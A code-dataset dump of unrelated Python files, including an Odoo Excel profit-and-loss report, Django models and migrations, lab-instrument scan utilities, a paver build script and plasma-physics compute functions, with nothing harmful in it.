credit_amount_4100005 = sum([rec.get('credit_amount') for rec in code_data.get('4100005')])
code_4100005 = deposit_amount_4100005 - credit_amount_4100005
if code_data.get('4100002'):
deposit_amount_4100002 = sum([rec.get('deposit_amount') for rec in code_data.get('4100002')])
credit_amount_4100002 = sum([rec.get('credit_amount') for rec in code_data.get('4100002')])
code_4100002 = deposit_amount_4100002 - credit_amount_4100002
if code_data.get('4100004'):
deposit_amount_4100004 = sum([rec.get('deposit_amount') for rec in code_data.get('4100004')])
credit_amount_4100004 = sum([rec.get('credit_amount') for rec in code_data.get('4100004')])
code_4100004 = deposit_amount_4100004 - credit_amount_4100004
if code_data.get('5100003'):
deposit_amount_5100003 = sum([rec.get('deposit_amount') for rec in code_data.get('5100003')])
credit_amount_5100003 = sum([rec.get('credit_amount') for rec in code_data.get('5100003')])
code_5100003 = deposit_amount_5100003 - credit_amount_5100003
if code_data.get('5100005'):
deposit_amount_5100005 = sum([rec.get('deposit_amount') for rec in code_data.get('5100005')])
credit_amount_5100005 = sum([rec.get('credit_amount') for rec in code_data.get('5100005')])
code_5100005 = deposit_amount_5100005 - credit_amount_5100005
if code_data.get('5100002'):
deposit_amount_5100002 = sum([rec.get('deposit_amount') for rec in code_data.get('5100002')])
credit_amount_5100002 = sum([rec.get('credit_amount') for rec in code_data.get('5100002')])
code_5100002 = deposit_amount_5100002 - credit_amount_5100002
if code_data.get('5100004'):
deposit_amount_5100004 = sum([rec.get('deposit_amount') for rec in code_data.get('5100004')])
credit_amount_5100004 = sum([rec.get('credit_amount') for rec in code_data.get('5100004')])
code_5100004 = deposit_amount_5100004 - credit_amount_5100004
if code_data.get('5200001'):
deposit_amount_5200001 = sum([rec.get('deposit_amount') for rec in code_data.get('5200001')])
credit_amount_5200001 = sum([rec.get('credit_amount') for rec in code_data.get('5200001')])
code_5200001 = deposit_amount_5200001 - credit_amount_5200001
if code_data.get('5200002'):
deposit_amount_5200002 = sum([rec.get('deposit_amount') for rec in code_data.get('5200002')])
credit_amount_5200002 = sum([rec.get('credit_amount') for rec in code_data.get('5200002')])
code_5200002 = deposit_amount_5200002 - credit_amount_5200002
if code_data.get('5200003'):
deposit_amount_5200003 = sum([rec.get('deposit_amount') for rec in code_data.get('5200003')])
credit_amount_5200003 = sum([rec.get('credit_amount') for rec in code_data.get('5200003')])
code_5200003 = deposit_amount_5200003 - credit_amount_5200003
if code_data.get('5200004'):
deposit_amount_5200004 = sum([rec.get('deposit_amount') for rec in code_data.get('5200004')])
credit_amount_5200004 = sum([rec.get('credit_amount') for rec in code_data.get('5200004')])
code_5200004 = deposit_amount_5200004 - credit_amount_5200004
if code_data.get('5200005'):
deposit_amount_5200005 = sum([rec.get('deposit_amount') for rec in code_data.get('5200005')])
credit_amount_5200005 = sum([rec.get('credit_amount') for rec in code_data.get('5200005')])
code_5200005 = deposit_amount_5200005 - credit_amount_5200005
if code_data.get('5200006'):
deposit_amount_5200006 = sum([rec.get('deposit_amount') for rec in code_data.get('5200006')])
credit_amount_5200006 = sum([rec.get('credit_amount') for rec in code_data.get('5200006')])
code_5200006 = deposit_amount_5200006 - credit_amount_5200006
if code_data.get('5200007'):
deposit_amount_5200007 = sum([rec.get('deposit_amount') for rec in code_data.get('5200007')])
credit_amount_5200007 = sum([rec.get('credit_amount') for rec in code_data.get('5200007')])
code_5200007 = deposit_amount_5200007 - credit_amount_5200007
if code_data.get('5200008'):
deposit_amount_5200008 = sum([rec.get('deposit_amount') for rec in code_data.get('5200008')])
credit_amount_5200008 = sum([rec.get('credit_amount') for rec in code_data.get('5200008')])
code_5200008 = deposit_amount_5200008 - credit_amount_5200008
if code_data.get('5200009'):
deposit_amount_5200009 = sum([rec.get('deposit_amount') for rec in code_data.get('5200009')])
credit_amount_5200009 = sum([rec.get('credit_amount') for rec in code_data.get('5200009')])
code_5200009 = deposit_amount_5200009 - credit_amount_5200009
if code_data.get('5200010'):
deposit_amount_5200010 = sum([rec.get('deposit_amount') for rec in code_data.get('5200010')])
credit_amount_5200010 = sum([rec.get('credit_amount') for rec in code_data.get('5200010')])
code_5200010 = deposit_amount_5200010 - credit_amount_5200010
sales_total = code_4100002 + code_4100003 + code_4100004 + code_4100005
sheet.write(row, 7, round(code_4100003, 2), format10)
sheet.write(row, 8, round(code_4100005, 2), format10)
sheet.write(row, 9, round(code_4100002, 2), format10)
sheet.write(row, 10, round(code_4100004, 2), format10)
sheet.write(row, 11, round(sales_total, 2), format11)
semi_total_code_4100003 += code_4100003
semi_total_code_4100005 += code_4100005
semi_total_code_4100002 += code_4100002
semi_total_code_4100004 += code_4100004
semi_total_code_5100003 += code_5100003
semi_total_code_5100005 += code_5100005
semi_total_code_5100002 += code_5100002
semi_total_code_5100004 += code_5100004
semi_total_code_5200001 += code_5200001
semi_total_code_5200002 += code_5200002
semi_total_code_5200003 += code_5200003
semi_total_code_5200004 += code_5200004
semi_total_code_5200005 += code_5200005
semi_total_code_5200006 += code_5200006
semi_total_code_5200007 += code_5200007
semi_total_code_5200008 += code_5200008
semi_total_code_5200009 += code_5200009
semi_total_code_5200010 += code_5200010
semi_sales_total += sales_total
purchase_total = code_5100002 + code_5100003 + code_5100004 + code_5100005
semi_purchase_total += purchase_total
sheet.write(row, 12, round(code_5100003, 2), format10)
sheet.write(row, 13, round(code_5100005, 2), format10)
sheet.write(row, 14, round(code_5100002, 2), format10)
sheet.write(row, 15, round(code_5100004, 2), format10)
sheet.write(row, 16, round(purchase_total, 2), format11)
city_name = excel_lines.get('city').name
sheet.write(row, 18, round(code_5200001, 2), format10)
sheet.write(row, 19, round(code_5200002, 2), format10)
sheet.write(row, 20, round(code_5200003, 2), format10)
sheet.write(row, 21, round(code_5200004, 2), format10)
sheet.write(row, 22, round(code_5200005, 2), format10)
sheet.write(row, 23, round(code_5200006, 2), format10)
sheet.write(row, 24, round(code_5200007, 2), format10)
sheet.write(row, 25, round(code_5200008, 2), format10)
sheet.write(row, 26, round(code_5200009, 2), format10)
sheet.write(row, 27, round(code_5200010, 2), format10)
other_cos_total = code_5200001 + code_5200002 + code_5200003 + code_5200004 + \
code_5200005 + code_5200006 + code_5200007 + code_5200008 + \
code_5200009 + code_5200010
semi_other_cos_total += other_cos_total
sheet.write(row, 28, round(other_cos_total, 2), format11)
city_names.append(city_name)
difference = sales_total - purchase_total
if sales_total > 0:
gp_percent = (difference/sales_total)*100
else:
gp_percent = 0
semi_gp_percent_total += gp_percent
semi_difference_total += difference
sheet.write(row, 30, round(sales_total, 2), format10)
sheet.write(row, 31, round(purchase_total, 2), format10)
sheet.write(row, 32, round(difference, 2), format10)
sheet.write(row, 33, round(gp_percent, 2), format10)
row += 1
sheet.write_merge(row, row, 0, 6, 'Total', format13)
final_total_code_4100003 += semi_total_code_4100003
final_total_code_4100005 += semi_total_code_4100005
final_total_code_4100002 += semi_total_code_4100002
final_total_code_4100004 += semi_total_code_4100004
final_total_code_5100003 += semi_total_code_5100003
final_total_code_5100005 += semi_total_code_5100005
final_total_code_5100002 += semi_total_code_5100002
final_total_code_5100004 += semi_total_code_5100004
final_total_code_5200001 += semi_total_code_5200001
final_total_code_5200002 += semi_total_code_5200002
final_total_code_5200003 += semi_total_code_5200003
final_total_code_5200004 += semi_total_code_5200004
final_total_code_5200005 += semi_total_code_5200005
final_total_code_5200006 += semi_total_code_5200006
final_total_code_5200007 += semi_total_code_5200007
final_total_code_5200008 += semi_total_code_5200008
final_total_code_5200009 += semi_total_code_5200009
final_total_code_5200010 += semi_total_code_5200010
final_sales_total += semi_sales_total
final_purchase_total += semi_purchase_total
final_difference_total += semi_difference_total
final_other_cos_total += semi_other_cos_total
final_gp_percent_total += semi_gp_percent_total
sheet.write(row, 7, round(semi_total_code_4100003, 2), format12)
sheet.write(row, 8, round(semi_total_code_4100005, 2), format12)
sheet.write(row, 9, round(semi_total_code_4100002, 2), format12)
sheet.write(row, 10, round(semi_total_code_4100004, 2), format12)
sheet.write(row, 11, round(semi_sales_total, 2), format12)
sheet.write(row, 12, round(semi_total_code_5100003, 2), format12)
sheet.write(row, 13, round(semi_total_code_5100005, 2), format12)
sheet.write(row, 14, round(semi_total_code_5100002, 2), format12)
sheet.write(row, 15, round(semi_total_code_5100004, 2), format12)
sheet.write(row, 16, round(semi_purchase_total, 2), format12)
sheet.write(row, 18, round(semi_total_code_5200001, 2), format12)
sheet.write(row, 19, round(semi_total_code_5200002, 2), format12)
sheet.write(row, 20, round(semi_total_code_5200003, 2), format12)
sheet.write(row, 21, round(semi_total_code_5200004, 2), format12)
sheet.write(row, 22, round(semi_total_code_5200005, 2), format12)
sheet.write(row, 23, round(semi_total_code_5200006, 2), format12)
sheet.write(row, 24, round(semi_total_code_5200007, 2), format12)
sheet.write(row, 25, round(semi_total_code_5200008, 2), format12)
sheet.write(row, 26, round(semi_total_code_5200009, 2), format12)
sheet.write(row, 27, round(semi_total_code_5200010, 2), format12)
sheet.write(row, 28, round(semi_other_cos_total, 2), format12)
sheet.write(row, 30, round(semi_sales_total, 2), format12)
sheet.write(row, 31, round(semi_purchase_total, 2), format12)
sheet.write(row, 32, round(semi_difference_total, 2), format12)
sheet.write(row, 33, round(semi_gp_percent_total, 2), format12)
row += 1
row += 1
sheet.write_merge(row, row, 0, 6, 'Total', format15)
sheet.write(row, 7, round(final_total_code_4100003, 2), format14)
sheet.write(row, 8, round(final_total_code_4100005, 2), format14)
sheet.write(row, 9, round(final_total_code_4100002, 2), format14)
sheet.write(row, 10, round(final_total_code_4100004, 2), format14)
sheet.write(row, 11, round(final_sales_total, 2), format14)
sheet.write(row, 12, round(final_total_code_5100003, 2), format14)
sheet.write(row, 13, round(final_total_code_5100005, 2), format14)
sheet.write(row, 14, round(final_total_code_5100002, 2), format14)
sheet.write(row, 15, round(final_total_code_5100004, 2), format14)
sheet.write(row, 16, round(final_purchase_total, 2), format14)
sheet.write(row, 18, round(final_total_code_5200001, 2), format14)
sheet.write(row, 19, round(final_total_code_5200002, 2), format14)
sheet.write(row, 20, round(final_total_code_5200003, 2), format14)
sheet.write(row, 21, round(final_total_code_5200004, 2), format14)
sheet.write(row, 22, round(final_total_code_5200005, 2), format14)
sheet.write(row, 23, round(final_total_code_5200006, 2), format14)
sheet.write(row, 24, round(final_total_code_5200007, 2), format14)
sheet.write(row, 25, round(final_total_code_5200008, 2), format14)
sheet.write(row, 26, round(final_total_code_5200009, 2), format14)
sheet.write(row, 27, round(final_total_code_5200010, 2), format14)
sheet.write(row, 28, round(final_other_cos_total, 2), format14)
sheet.write(row, 30, round(final_sales_total, 2), format14)
sheet.write(row, 31, round(final_purchase_total, 2), format14)
sheet.write(row, 32, round(final_difference_total, 2), format14)
sheet.write(row, 33, round(final_gp_percent_total, 2), format14)
filename = ('Project Profit & Loss Analysis'+ '.xls')
workbook.save(filename)
file = open(filename, "rb")
file_data = file.read()
out = base64.encodestring(file_data)
export_id = self.env['profit.loss.excel'].create({'file_name': filename, 'field_data': out})
return {
'type': 'ir.actions.act_window',
'res_model': 'profit.loss.excel',
'view_mode': 'form',
'view_type': 'form',
'view_id': self.env.ref('zaki_profit_loss_excel_report.account_profit_loss_report_excel_wizard').id,
'res_id': export_id.id,
'target': 'new',
} |
19,242 | 423fe5c1b0e487c00e132243e4c80d5da3f91ccd |
# include:
# A function that takes a full Python import path
# to another URLconf module that should
# be “included” in this place.
from django.contrib import admin
# include: so you can include separate files.
from django.urls import path, include
urlpatterns = [
path('', include('leads.urls')),
]
|
19,243 | b88228138abad89fa20286f9fa267b12373476d2 | from django.db.models import Model
from django.db.models import CharField, TextField, ForeignKey, BooleanField, ImageField
from django.db.models import SET_NULL
from .setting import Setting
from django.db.models.signals import pre_delete, pre_save
from django.dispatch import receiver
class Page(Model):
name = CharField(max_length=200, verbose_name='Название')
is_sidebar = BooleanField(default=False, verbose_name='Сайдбар?')
sidebar_name = CharField(max_length=200, null=True, blank=True, default='', verbose_name='Сайдбар, название')
# sidebar_menu = ForeignKey('Menu', blank=True, null=True, on_delete=SET_NULL, verbose_name='Сайдбар, пункт меню')
slug = CharField(max_length=200, verbose_name='Техническое имя')
menu = ForeignKey('Menu', blank=True, null=True, on_delete=SET_NULL, verbose_name='Меню')
html = TextField(verbose_name='HTML')
def __str__(self):
return '%s -> %s' % (self.menu if self.menu else '|', self.name)
@staticmethod
def get(slug):
try:
text = Page.objects.get(slug=slug).html
except:
text = Setting.get('no_page_parent')
return text
@staticmethod
def get_menu(menu):
pages = Page.objects.filter(menu=menu)
return {page.slug: page.name for page in pages}
class Meta:
verbose_name = 'Страница'
verbose_name_plural = 'Страницы'
class PageImage(Model):
page = ForeignKey(Page, null=True, blank=True, on_delete=SET_NULL, verbose_name='Картинка для страницы')
slug = CharField(max_length=200, verbose_name='Техническое имя')
image = ImageField(upload_to='main/images/page_image/images', null=True, blank=True, verbose_name='Картинка')
def __str__(self):
return self.image.page.name
class Meta:
verbose_name = 'Картинка для страницы'
verbose_name_plural = 'Картинки для страниц'
# Сигналы --------------------------------------------------------------------------------------------------------------
# Удаление картинки при удалении объекта
@receiver(pre_delete, sender=PageImage)
def page_image_pre_delete(sender, instance, using, **kwargs):
instance.image.delete(save=False)
# Удаление картинки при изменении объекта
@receiver(pre_save, sender=PageImage)
def page_image_pre_save(sender, instance, raw, using, update_fields, **kwargs):
if not instance.pk:
return False
try:
old_image = PageImage.objects.get(pk=instance.pk).image
except PageImage.DoesNotExist:
return False
if not old_image == instance.image:
old_image.delete(save=False) |
19,244 | 4a3b09e8f8a7e7d03f50b3dc3b569ebc25f1d26f | from sys import stdin
from random import shuffle
lines = stdin.read().split('\n')
shuffle(lines)
for line in lines:
print line
|
19,245 | cd99abb02e0a4ee3c3c15adf25a7872b83f3786b | # -*- coding: utf-8 -*-
"""
Created on Mon Jun 10 14:49:26 2019
This is the utility file for ImAGERS, the KM group instrumentation software
(IMage Acquisition and Generalized Experimet Recipe Software).
This file should contain any functions that are common between multiple
experiment types with the goal of making it easy for users to design their own
experiment scripts by combining these functions in various ways.
Note: Storing classes in modules for easy loading: http://introtopython.org/classes.html#Storing-a-single-class-in-a-module
@author: ecating
"""
import numpy as np
import matplotlib.pyplot as plt
import time
# Functions to initialize your system -----------------------------------------
def load_config():
return
def initialize_all():
return
# Functions which provide spatial scan coordinates ----------------------------
def fermat_spiral_points(center, beam_diam, overlap, num_points):
"""Takes the central position and beam diameter and calculates positions
to scan according to a Fermat spiral. Uses the beam diameter and overlap
to calculate the necessary step size to achieve the desired overlap.
Does this for the number of overall positions desired."""
return spiral
def fermat_spiral_area(center, beam_diam, overlap, area):
"""Takes the central position and beam diameter and calculates positions
to scan according to a Fermat spiral. Uses the beam diameter and overlap
to calculate the necessary step size to achieve the desired overlap.
Does this for the overall scan area desired."""
return spiral
def rand_raster(center, step_size, num_points, random):
"""This function takes a center (x,y) coordinate, a desired average step
size, and number of point and generates a raster scan based on those
parameters. The random parameter is the percentage of the step size that
the coordinates may be randomly offset by (to prevent periodic sampling
errors."""
xscan = []
yscan = []
xcenter = center[0] # first element of center array
ycenter = center[1] # second element of center array
scan_size = int(np.sqrt(num_points)) # This assumes a square scan area
xrange = np.arange(xcenter - ((scan_size - 1) * step_size) / 2, xcenter + ((scan_size - 1) * step_size) / 2 + step_size, step_size)
yrange = np.arange(ycenter - ((scan_size - 1) * step_size) / 2, ycenter + ((scan_size - 1) * step_size) / 2 + step_size, step_size)
# Creates two arrays xscan and yscan
for step, ystep in enumerate(yrange):
xscan.append(xrange[::(-1)**step])
yscan.append(np.ones_like(xrange) * ystep)
xscan = np.concatenate(xscan)
yscan = np.concatenate(yscan)
# Combine the two arrays into a list of vectors
raster = []
for i in range(0, len(xscan)):
scan_element = []
scan_element.append(xscan[i])
scan_element.append(yscan[i])
raster.append(scan_element)
return raster
# Functions which provide temporal scan coordinates ---------------------------
def delay_times_linear(min_t, max_t, step_size):
"""This function takes a minimum delay in ps and a maximum delay in ps and
a step size and generates a range of delay stage positions"""
return np.flip(np.arange(max_t, min_t - step_size, -step_size))
def delay_times_double(min_t, t2, step_size1, max_t, step_size2):
foo = np.arange(t2, min_t - step_size1, -step_size1)
bar = np.arange(max_t, t2, -step_size2)
return np.flip(np.concatenate((bar,foo),axis=0))
def delay_times_exp(min_t, max_t, t0, min_step, max_step, number_of_steps):
"""Returns an array of delay times in exponential steps given min_t, max_t,
min_step, and max_step.
min_step and max_step currently not used"""
delays = []
after_t0 = np.logspace(np.log(min_t), np.log(t0), num = number_of_steps, endpoint = True, base = np.e)
after_t0 = min_t + t0 - after_t0
after_t0 = after_t0[::-1]
after_t0 = after_t0[:-1]
before_t0 = np.logspace(np.log(t0), np.log(max_t), num = number_of_steps / 2, endpoint = True, base = np.e)
delays = np.concatenate([after_t0, before_t0])
delays = delays.tolist()
y = np.zeros_like(delays)
plt.plot(delays, y, 'o')
return delays
# def ps_to_mm(delays, stage_passes, t0_in_ps):
# """Converts values in ps to values in mm."""
# mm_delays = (delays + t0_in_ps) * (1/stage_passes) * 0.2998
# return mm_delays
def ps_to_mm(delays, stage_passes):
"""Converts values in ps to values in mm."""
mm_delays = (delays) * (1/stage_passes) * 0.2998
return mm_delays
# def mm_to_ps(delays_in_mm, stage_passes, t0_in_ps):
# """Converts values in ps to values in mm."""
# ps_delays = (delays_in_mm * stage_passes)/0.2998 - t0_in_ps
# return ps_delays
def mm_to_ps(delays_in_mm, stage_passes):
"""Converts values in ps to values in mm."""
ps_delays = (delays_in_mm * stage_passes)/0.2998
return ps_delays
#
## --------------- Testing functions --------------------------------
#
#def alignStage(stage):
# for i in range(100):
# stage.moveStageTo(stage.maxPos)
# time.sleep(5/60)
# stage.moveStageTo(stage.minPos)
# time.sleep(5/60)
# Data plotting functions ---------------------------------------------------
def create_new_fig():
return plt.figure()
#def plot_point(x,y,fig_handle):
|
19,246 | 35d490ebe658d8aebffe565ee306899e36a2d937 | # Generated by Django 2.1.5 on 2019-02-12 04:06
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('mainsite', '0011_auto_20190212_1256'),
]
operations = [
migrations.RemoveField(
model_name='product',
name='product_type',
),
migrations.RemoveField(
model_name='product_type',
name='detail_type',
),
migrations.AddField(
model_name='product',
name='product_detail_type',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='mainsite.Product_detail_type'),
),
migrations.AddField(
model_name='product_detail_type',
name='product_type',
field=models.ForeignKey(default=123, on_delete=django.db.models.deletion.CASCADE, to='mainsite.Product_type'),
preserve_default=False,
),
]
|
19,247 | 073b738b2db6e90b84df6a5051c68f335bb1982d | import threading, time
print('Start of program.')
def takeANap(): #1
time.sleep(5)
print('Wake up!')
threadObj = threading.Thread(target=takeANap) #2
threadObj.start() #3
print('End of program.')
|
19,248 | f6bbcc3d237a90a9a2b0e482e7153ffe2f64d53e | def gap(a,b):
x = b-a
if x<0:
x = 10**18
return x
a,b = [int(i) for i in input().split()]
print(min(gap(a,b), 1+gap(a,-b), 1+gap(-a,b), 2+gap(-a,-b))) |
19,249 | b88a3c08f645eec248c4180df02a2b59d3c3c06f | version https://git-lfs.github.com/spec/v1
oid sha256:600e44b1e44019fcbcddf67dc8665ea6670580bf13c9a35ddb3affbffc55a895
size 1192
|
19,250 | 44c713cc21495d9d6b63c35e312e5060ce2bc61f | #!/usr/bin/python3.7
from unittest import TestCase
from logger_multi_modules.SingleLogger import SingleLogger
class TestSingleLogger(TestCase):
_name = "test.singlelogger"
def setUp(self):
try:
self.log = SingleLogger(("%s.%s" %("Single Logging", __name__)), 0, "../log/global/", "unified_logger.log")
self.assertIsInstance(self.log, SingleLogger, "Singleton Logger criado com sucesso")
except:
raise Exception
def testGetInfoLevel(self):
try:
self.log.getInfoLevel()
self.log.logger.info("Executed Log in Info Level")
except:
raise Exception
def testGetDebugLevel(self):
try:
self.log.getDebugLevel()
self.log.logger.debug("Executed Log in Debug Level")
except:
raise Exception
def testGetWarningLevel(self):
try:
self.log.getWarningLevel()
self.log.logger.warning("Executed Log in Warning Level")
except:
raise Exception
def testGetCriticalLevel(self):
try:
self.log.getCriticalLevel()
self.log.logger.critical("Executed Log in Critical Level")
except:
raise Exception
def testGetErrorLevel(self):
try:
self.log.getErrorlLevel()
self.log.logger.error("Executed Log in Error Level")
except:
raise Exception
def tearDown(self):
TestCase.tearDown(self)
def doCleanups(self):
return TestCase.doCleanups(self)
|
19,251 | 6da07f298a935ccfcafc6de826cd3727ccb93bdf | from paver import easy,options
from paver.easy import path,sh
from paver.options import Bunch
from jsmin import jsmin
from redis import Redis
try:
from uglipyjs import compile as uglify
except:
uglify = None
import json
import os
cache = Redis()
testbunch = Bunch(
x='y',
js_dir='js/files',
css_indir='css/src',
cssout='vendor/css',
)
SET_ARG = dict(ex=7200)
options.test = testbunch
options.assets = Bunch(
css='',
js='',
folders=Bunch(
js='static/js',
css='static/css',
),
js_files=[],
)
easy.environment.ttt = 'hnmmm'
easy.environment.assets = ''
cache_set = lambda key,val: cache.set(key,val,**SET_ARG)
cache_get = lambda key: cache.get(key)
def get_version():
import json
return json.loads(open('version.json','r').read()).get('version')
def set_version(version):
print 'setting version to {}'.format(version)
with open('version.json','w') as f:
f.write(json.dumps(dict(version=version)))
@easy.task
@easy.cmdopts([
('branch=','b','a new branch to create to work on')],
share_with=['done'])
def work_on(options,branch=None):
if branch is None:
branch = options.work_on.branch
cache_set('PAVER:GIT:BRANCH',branch)
easy.info('Switching to branch {}'.format(branch))
sh('git checkout -b {}'.format(branch))
def finish(branch=None):
if branch is not None:
sh('git checkout master')
sh('git merge {}'.format(branch))
sh('git branch -d {}'.format(branch))
increment_version()
@easy.task
@easy.cmdopts([
('branch=','b','the current branch to merge with master')]
,share_with=['work_on']
)
def done(options,branch=None):
if branch is None:
branch = cache_get('PAVER:GIT:BRANCH') or options.done.branch
finish(branch)
@easy.task
def version():
easy.info(get_version())
@easy.task
def increment_version():
version = get_version()
l,m,s = map(int,version.split('.'))
if s == 9:
s = 0
if m == 9:
m = 0
if str(l).endswith == '9':
l = (int(l[0]) + 1) + 0
else:
l += 1
else:
m += 1
else:
s += 1
set_version('.'.join(map(str,[l,m,s])))
@easy.task
def print_test(arg=None):
if arg is None:
print options.test.js_dir
else:
print arg
@easy.task
def print_more():
options.test.js_dir = 'yessss'
easy.call_task('print_test')
@easy.task
def out1():
easy.environment.assets = 'myassets\njbjkak\nxjbxkbk\n'
@easy.task
def out2():
easy.call_task('out1')
#print easy.environment.assets
assets = easy.environment.assets.split('\n')
easy.environment.assets = assets
@easy.task
def out3(assets):
easy.call_task('out2')
print easy.environment.assets
@easy.task
def get_js():
options.assets.js_files = [(x.name,x.text()) for x in easy.path(options.assets.folders.js).files()]
@easy.task
def get_css():
return options.assets.css
@easy.task
@easy.consume_args
def add_js_files(args,files=[]):
for filename in args + files:
options.assets.js += easy.path(filename).text()
@easy.task
@easy.consume_args
def show(args,ttt):
if args:
options.assets.folders.js = args[0]
easy.call_task('increment_version')
easy.call_task('get_js')
easy.call_task('minify')
easy.call_task('uglify')
easy.call_task('concat')
print get_version()
@easy.task
def minify():
options.assets.js_files = map(lambda x: ((x[0],jsmin(x[1]))),options.assets.js_files)
@easy.task
def uglify():
for fle,data in options.assets.js_files:
try:
options.assets.js_files[options.assets.js_files.index((fle,data))] = (fle,uglify(data))
except:
print fle
#options.assets.js_files = map(compile,options.assets.js_files)
@easy.task
def concat():
options.assets.js = ''.join(map(lambda x: str(x[1]),options.assets.js_files))
|
19,252 | 8f290cf358c044fa6b4fad1789410acddc77af6c | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 17 18:51:34 2018
@author: Amanda
"""
import json
estoque = {'chuchu':2, 'abacaxi':3}
estoquestr= json.dumps(estoque)
estoque = json.loads(estoquestr)
print(estoquestr[5])
print(estoque)
print(estoque['chuchu'])
|
19,253 | 8d435c89642ba052eda3fbed27e747c4639bff17 | from django.db import models
# Create your models here.
class tipos(models.Model):
id=models.AutoField(primary_key=True)
codigo=models.CharField(max_length=80, )
nombre=models.CharField(max_length=180 , )
abreviatura=models.CharField(max_length=80)
estado=models.BooleanField()
fecha_creacion=models.DateTimeField()
fecha_modificacion=models.DateTimeField()
class razas(models.Model):
id=models.AutoField(primary_key=True)
codigo=models.CharField(max_length=80,)
nombre=models.CharField(max_length=180 ,)
abreviatura=models.CharField(max_length=80)
id_tipo=models.ForeignKey(tipos, on_delete=models.CASCADE)
estado=models.BooleanField()
fecha_creacion=models.DateTimeField()
fecha_modificacion=models.DateTimeField()
class mascotas(models.Model):
id=models.AutoField(primary_key=True)
codigo=models.CharField(max_length=80, )
id_tipo=models.ForeignKey(tipos, on_delete=models.CASCADE)
id_raza=models.ForeignKey(razas, on_delete=models.CASCADE)
nombre=models.CharField(max_length=180)
tiene_vacunas=models.BooleanField()
estado=models.BooleanField()
fecha_creacion=models.DateTimeField()
fecha_modificacion=models.DateTimeField() |
19,254 | 02e9a8c8b9f9908ccdd9729530092644771a7f2d | """Core compute functions, for polar, flux, and cartesian coordinates."""
from desc.backend import jnp
from .data_index import register_compute_fun
@register_compute_fun(
name="0",
label="0",
units="~",
units_long="None",
description="Zeros",
dim=1,
params=[],
transforms={"grid": []},
profiles=[],
coordinates="rtz",
data=[],
)
def _0(params, transforms, profiles, data, **kwargs):
data["0"] = jnp.zeros(transforms["grid"].num_nodes)
return data
@register_compute_fun(
name="R",
label="R",
units="m",
units_long="meters",
description="Major radius in lab frame",
dim=1,
params=["R_lmn"],
transforms={"R": [[0, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R(params, transforms, profiles, data, **kwargs):
data["R"] = transforms["R"].transform(params["R_lmn"], 0, 0, 0)
return data
@register_compute_fun(
name="R_r",
label="\\partial_{\\rho} R",
units="m",
units_long="meters",
description="Major radius in lab frame, first radial derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[1, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_r(params, transforms, profiles, data, **kwargs):
data["R_r"] = transforms["R"].transform(params["R_lmn"], 1, 0, 0)
return data
@register_compute_fun(
name="R_rr",
label="\\partial_{\\rho \\rho} R",
units="m",
units_long="meters",
description="Major radius in lab frame, second radial derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rr(params, transforms, profiles, data, **kwargs):
data["R_rr"] = transforms["R"].transform(params["R_lmn"], 2, 0, 0)
return data
@register_compute_fun(
name="R_rrr",
label="\\partial_{\rho \\rho \\rho} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third radial derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[3, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrr(params, transforms, profiles, data, **kwargs):
data["R_rrr"] = transforms["R"].transform(params["R_lmn"], 3, 0, 0)
return data
@register_compute_fun(
name="R_rrrr",
label="\\partial_{\rho \\rho \\rho \\rho} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth radial derivative",
dim=1,
params=["R_lmn"],
transforms={"R": [[4, 0, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrrr(params, transforms, profiles, data, **kwargs):
data["R_rrrr"] = transforms["R"].transform(params["R_lmn"], 4, 0, 0)
return data
@register_compute_fun(
name="R_rrrt",
label="\\partial_{\rho \\rho \\rho \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt"
" radial coordinate thrice and poloidal once",
dim=1,
params=["R_lmn"],
transforms={"R": [[3, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrrt(params, transforms, profiles, data, **kwargs):
data["R_rrrt"] = transforms["R"].transform(params["R_lmn"], 3, 1, 0)
return data
@register_compute_fun(
name="R_rrrz",
label="\\partial_{\rho \\rho \\rho \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt"
" radial coordinate thrice and toroidal once",
dim=1,
params=["R_lmn"],
transforms={"R": [[3, 0, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrrz(params, transforms, profiles, data, **kwargs):
data["R_rrrz"] = transforms["R"].transform(params["R_lmn"], 3, 0, 1)
return data
@register_compute_fun(
name="R_rrt",
label="\\partial_{\\rho \\rho \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, third derivative, wrt radius twice "
"and poloidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 1, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrt(params, transforms, profiles, data, **kwargs):
data["R_rrt"] = transforms["R"].transform(params["R_lmn"], 2, 1, 0)
return data
@register_compute_fun(
name="R_rrtt",
label="\\partial_{\\rho \\rho \\theta \\theta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fouth derivative, wrt radius twice "
"and poloidal angle twice",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 2, 0]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrtt(params, transforms, profiles, data, **kwargs):
data["R_rrtt"] = transforms["R"].transform(params["R_lmn"], 2, 2, 0)
return data
@register_compute_fun(
name="R_rrtz",
label="\\partial_{\\rho \\rho \\theta \\zeta} R",
units="m",
units_long="meters",
description="Major radius in lab frame, fourth derivative wrt radius twice,"
" poloidal angle, and toroidal angle",
dim=1,
params=["R_lmn"],
transforms={"R": [[2, 1, 1]]},
profiles=[],
coordinates="rtz",
data=[],
)
def _R_rrtz(params, transforms, profiles, data, **kwargs):
data["R_rrtz"] = transforms["R"].transform(params["R_lmn"], 2, 1, 1)
return data
@register_compute_fun(
name="R_rrz",
label="\\partial_{\\rho \\rho \\zeta} R",
units="m",
units_long="meters",
